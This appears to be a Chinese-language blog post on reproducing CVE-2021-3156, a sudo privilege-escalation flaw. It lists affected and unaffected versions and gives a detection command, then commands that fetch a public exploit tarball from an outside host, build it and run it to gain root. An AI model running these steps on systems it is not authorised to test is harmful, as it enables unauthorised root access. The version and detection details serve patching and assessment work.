测试环境

  • OS: Ubuntu 18.04.5 LTS
  • GCC: gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)
  • Make: GNU Make 4.1
  • EXP: https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
  • Sudo : Sudoers I/O plugin version 1.8.21p2

影响版本

Sudo Version 1.8.2 - 1.8.31p2

Sudo Version  1.9.0 - 1.9.5p1

不影响版本

Sudo Version => 1.9.5p2

漏洞检测

sudoedit -s /

受影响的开头是sudoedit, 不受影响的是usage

漏洞复现

wget https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz

tar -zxvf CVE-2021-3156_nss_poc_ubuntu.tar.gz

cd CVE-2021-3156/

make

./sudo-hax-me-a-sandwich target

当然 也可以一步步的来 我是用;拼接了的

target有0,1,具体单独运行看下就可以 退出ctrl+d or exit都可以的

最新文章

  1. mysql函数大全
  2. 分享Kali Linux 2016.2第50周镜像文件
  3. WEB启动时就加载servlet的dopost方法
  4. eclipse 安装activity插件
  5. 使用.Net自带的GZipStream进行流压缩与解压
  6. cron
  7. iOS设计模式之组合模式
  8. Java 动态眨眼 EyesJPanel (整理)
  9. javaweb学习总结二十二(servlet开发中常见的问题汇总)
  10. linux VM命令下查找
  11. Amdroid示例:利用Gson生成或解析json
  12. UltraISO制作U盘系统安装盘(图文教程)
  13. (cljs/run-at (->JSVM :browser) "语言基础")
  14. JAVA高并发
  15. jBPM学习之利用API完成流程实例
  16. CSS3让长单词与URL地址自动换行——word-wrap属性
  17. chrono--高精度计时
  18. ThinkPHP5配置redis缓存
  19. VMware虚拟机CentOS7网络通信与无线上网
  20. MII与RMII接口的区别【转】

热门文章

  1. 温故知新,.Net Core利用UserAgent+rDNS双解析方案,正确识别并反爬虫/反垃圾邮件
  2. 测试开发:推荐一款阿里最新 Python 自动化开源工具!
  3. POJ 3304 Segments 叉积
  4. 初识Sonarqube
  5. 打通“任督二脉”:Android 应用安装优化实战
  6. Java实验项目三——递归实现字符串查找和替换操作
  7. C++11运算符重载详解与向量类重载实例(<<,>>,+,-,*等)
  8. [刘阳Java]_BeanNameViewResolver视图解析器_第8讲
  9. ES6 箭头函数及this
  10. Linux基础服务搭建综合